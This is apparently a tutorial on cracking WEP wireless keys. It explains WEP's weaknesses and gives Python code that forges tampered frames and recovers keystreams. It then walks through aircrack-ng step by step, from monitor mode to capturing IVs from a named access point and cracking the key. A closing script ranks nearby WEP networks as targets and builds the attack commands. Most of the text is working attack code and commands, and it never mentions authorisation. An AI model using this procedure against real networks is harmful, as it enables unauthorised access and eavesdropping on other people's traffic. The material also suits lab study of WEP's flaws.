WEP offers protection for data being transferred over the air. It works by providing encryption and authentication. WEP is the oldest of the wireless encryption protocols and it is also the easiest to break. In this how-to we will look at the steps necessary to crack a WEP key.

WEP was developed to provide the following:

  • Protection from eavesdropping on communications, reducing unauthorized disclosure of data
  • Encryption of packets prior to transmission with a shared secret key
  • An integrity check on data as it flows across the network
  • Confidentiality, access control and integrity in a lightweight, efficient system

WEP Vulnerabilities:

  • CRC-32 (Cyclic Redundancy Check), used for the integrity check value, is linear, so an attacker can flip chosen bits in an encrypted packet and adjust the encrypted checksum so that the modified packet is still accepted, without knowing the key
  • WEP is susceptible to DoS attacks through associate and disassociate messages, which are not authenticated by WEP
  • Keys, or the per-IV keystreams, may be uncovered through analysis of captured packets, allowing the creation of a decryption table
  • WEP is vulnerable to known-plaintext attacks through analysis of captured packets (ciphertext XOR known plaintext gives the keystream for that IV)
  • Initialization vectors (IVs) are only 24 bits long, so the entire pool can be exhausted by moderate use within 5 hours or so, after which keystreams repeat

WEP uses initialization vectors. An IV is a per-packet 24-bit value that is prepended to the shared secret key to form the RC4 key for that packet, and it is sent in cleartext in front of the encrypted payload. Because the IV is short, is the only per-packet input to RC4, and is often chosen predictably (many cards simply count up), the way WEP generates and uses IVs makes captured traffic vulnerable to analysis and key cracking.
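To make the first, fourth and fifth flaws above concrete, here is an added example written for this page (not code from the original article or from aircrack-ng). It builds WEP frames the way 802.11 does (RC4 keyed with IV||secret, CRC-32 ICV appended to the payload), then shows that an attacker who does not know the key can flip chosen plaintext bits and fix up the encrypted ICV because CRC-32 is affine, and that two frames sent under the same IV share a keystream, so one known plaintext decrypts the other. The key, IVs and packet contents are constructed sample values.

```python
# Added example for this page: toy WEP frames and two attacks on them.
# Key, IVs and payloads below are constructed sample values.
import struct
import zlib

IV_LEN = 3  # WEP IVs are 24 bits, sent in the clear in front of the payload


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP keys it with IV || shared secret."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data: bytes) -> bytes:
    """WEP's ICV: CRC-32 of the plaintext, appended little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xffffffff)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || (plaintext || ICV) XOR RC4(IV || secret)."""
    assert len(iv) == IV_LEN
    body = plaintext + crc32_le(plaintext)
    return iv + xor(body, rc4_keystream(iv + secret, len(body)))


def wep_decrypt(secret: bytes, frame: bytes):
    """Return (plaintext, icv_ok), i.e. what a receiving station sees."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    dec = xor(body, rc4_keystream(iv + secret, len(body)))
    plaintext, icv = dec[:-4], dec[-4:]
    return plaintext, icv == crc32_le(plaintext)


def flip_plaintext_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker side: XOR `delta` into the plaintext of an encrypted frame
    without the key. CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(0*n),
    so the ICV correction depends only on `delta`, never on the plaintext."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    plen = len(body) - 4
    delta = delta.ljust(plen, b"\x00")
    icv_fix = xor(crc32_le(delta), crc32_le(bytes(plen)))
    return iv + xor(body, delta + icv_fix)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR (plaintext || ICV) is the RC4
    keystream for this frame's IV."""
    return xor(frame[IV_LEN:], known_plaintext + crc32_le(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt another frame that reused the same IV (hence the same keystream)."""
    return xor(frame[IV_LEN:], keystream)[:-4]


if __name__ == "__main__":
    secret = b"\x01\x02\x03\x04\x05"          # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"
    frame = wep_encrypt(secret, iv, b"GET /index.html")
    # 1. Bit-flip "GET" into "PUT" without the key; the ICV still verifies.
    tampered = flip_plaintext_bits(frame, xor(b"GET", b"PUT"))
    print(wep_decrypt(secret, tampered))       # (b'PUT /index.html', True)
    # 2. IV reuse: a known plaintext under IV 000001 decrypts another frame.
    other = wep_encrypt(secret, iv, b"secret payload!")
    ks = recover_keystream(frame, b"GET /index.html")
    print(decrypt_with_keystream(other, ks))   # b'secret payload!'
```

Note that flipping the ciphertext bytes without the ICV fix-up produces a frame the receiver rejects, which is exactly why the linearity of CRC-32 matters: the fix-up costs the attacker nothing, whereas a keyed MAC would have stopped the modification.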

Breaking WEP

First, on the laptop we have to make sure the wireless adapter is up and running. We are using Kali Linux for this, but the commands should be similar on other distributions.

iw dev
phy#0
    Interface wlan0
        ifindex 3
        wdev 0x1
        addr .....
        type managed   <---specifies the operational mode of the wireless device (managed = normal client mode)
        channel 2 ....

Let's run airmon-ng to list the wireless interfaces with their drivers and chipsets

airmon-ng

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation WiFi Link 5100

Enter the following command to put the adapter into monitor mode. If airmon-ng warns about interfering processes, as it does below, run 'airmon-ng check kill' first; otherwise NetworkManager or wpa_supplicant may reset the interface during the capture.

airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  492 NetworkManager
  666 wpa_supplicant
  782 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation WiFi Link 5100

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

Now run the iw dev command again to make sure the adapter is in monitor mode; note that the interface is now called wlan0mon, and that name is what the following commands use

iw dev
phy#0
	Interface wlan0mon
		ifindex 4
		wdev 0x2
		addr 00:22:fb:17:e2:a2
		type monitor
		channel 10 (2457 MHz), width: 20 MHz (no HT), center1: 2457 MHz

Start airodump-ng to scan for access points on all channels

 airodump-ng wlan0mon

You should see a list of the access points in your area

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                          
 84:9x:8C:9D:BC:38  -22      922     3717    0   2  54  WEP WEP          H1   
 08:0x:81:CE:83:FB  -46      203        0    0  11  54e  WPA2 CCMP   PSK  

As you can see, the access point with ESSID H1 is running WEP (ENC column) on channel 2, and its #Data counter is already climbing.
Now enter the following command to lock the capture to that network: -w gives the prefix for the output files (airodump-ng appends -01.cap, -01.csv and so on), -c the channel number, and --bssid the MAC address of the access point

airodump-ng -w result.txt -c 2 --bssid 84:9x:8C:9D:BC:38 wlan0mon

The #Data column counts captured data frames, each of which carries an IV; we will need at least about 15,000 of them before the crack succeeds (more helps, and on an idle network collecting them can take a long time).
Leave airodump-ng running and, in a second terminal, run the following command to crack the key; aircrack-ng reads the capture file as it is at that moment, so it can simply be re-run as the capture grows

aircrack-ng result.txt-01.cap

Here is one more way to run the data capture: without a --bssid filter it records every access point on the given channel (channel 11 in this example). The output prefix must still be given with -w, so the file to hand to aircrack-ng would be resultnew-01.cap

airodump-ng -c 11 -w resultnew wlan0mon
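The whole procedure above (scan, pick the WEP network, capture on its channel and BSSID, hand the .cap to aircrack-ng) can be driven from the CSV file airodump-ng writes next to the .cap instead of reading the screen. The following is an added example written for this page, not part of aircrack-ng or the original article. It parses the prefix-01.csv access-point section, picks the WEP networks strongest-first, reports whether the 15,000-IV target from the text has been reached, and builds the same airodump-ng and aircrack-ng command lines used above. The CSV rows, BSSIDs and ESSIDs are constructed sample data laid out in the column order this example assumes airodump-ng uses (BSSID, times, channel, speed, privacy, cipher, auth, power, beacons, IVs, LAN IP, ID length, ESSID).

```python
# Added example for this page: choose WEP targets from airodump-ng's CSV
# output and build the capture/crack commands from the how-to.
# SAMPLE_CSV is constructed test data in the assumed airodump-ng layout.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2015-01-01 10:00:00, 2015-01-01 10:05:00,  2,  54, WEP , WEP, , -22,      922,     3717,   0.  0.  0.  0,   2, H1,
AA:BB:CC:DD:EE:02, 2015-01-01 10:00:00, 2015-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -46,      203,        0,   0.  0.  0.  0,   6, Office,
AA:BB:CC:DD:EE:03, 2015-01-01 10:00:00, 2015-01-01 10:05:00,  6,  54, WEP , WEP, , -70,       10,    16000,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

MIN_IVS = 15000  # the figure given in the text above


def parse_access_points(csv_text: str) -> list:
    """Return one dict per row of the access-point section of the CSV.
    The AP section ends at the first blank line; the client table follows."""
    rows = []
    for line in csv_text.splitlines():
        if not line.strip():
            break
        fields = [f.strip() for f in line.split(",")]
        if fields[0] == "BSSID" or len(fields) < 14:
            continue  # header or malformed/short row
        rows.append({
            "bssid": fields[0],
            "channel": int(fields[3]),
            "privacy": fields[5],
            "cipher": fields[6],
            "power": int(fields[8]),
            "ivs": int(fields[10]),
            "essid": fields[13],
        })
    return rows


def wep_targets(rows: list) -> list:
    """WEP networks only, strongest signal first (power is in dBm)."""
    wep = [r for r in rows if r["privacy"].upper().startswith("WEP")]
    return sorted(wep, key=lambda r: r["power"], reverse=True)


def ready_to_crack(ap: dict, min_ivs: int = MIN_IVS) -> bool:
    """True once the capture holds at least min_ivs data frames (IVs)."""
    return ap["ivs"] >= min_ivs


def capture_command(ap: dict, prefix: str, iface: str) -> list:
    """The locked-down airodump-ng invocation from the how-to, as argv."""
    return ["airodump-ng", "-c", str(ap["channel"]),
            "--bssid", ap["bssid"], "-w", prefix, iface]


def crack_command(prefix: str) -> list:
    """airodump-ng numbers its output files; the first capture is prefix-01.cap."""
    return ["aircrack-ng", f"{prefix}-01.cap"]


if __name__ == "__main__":
    import shlex
    for ap in wep_targets(parse_access_points(SAMPLE_CSV)):
        state = "ready" if ready_to_crack(ap) else "need more IVs"
        print(f"{ap['essid']:8} ch {ap['channel']:2} {ap['ivs']:6} IVs  {state}")
        print("  " + shlex.join(capture_command(ap, "result", "wlan0mon")))
        print("  " + shlex.join(crack_command("result")))
```

The ESSID is taken as a single field, so a network name containing a comma will be split; airodump-ng's CSV does not quote it, which is a limitation of the format rather than of the parser.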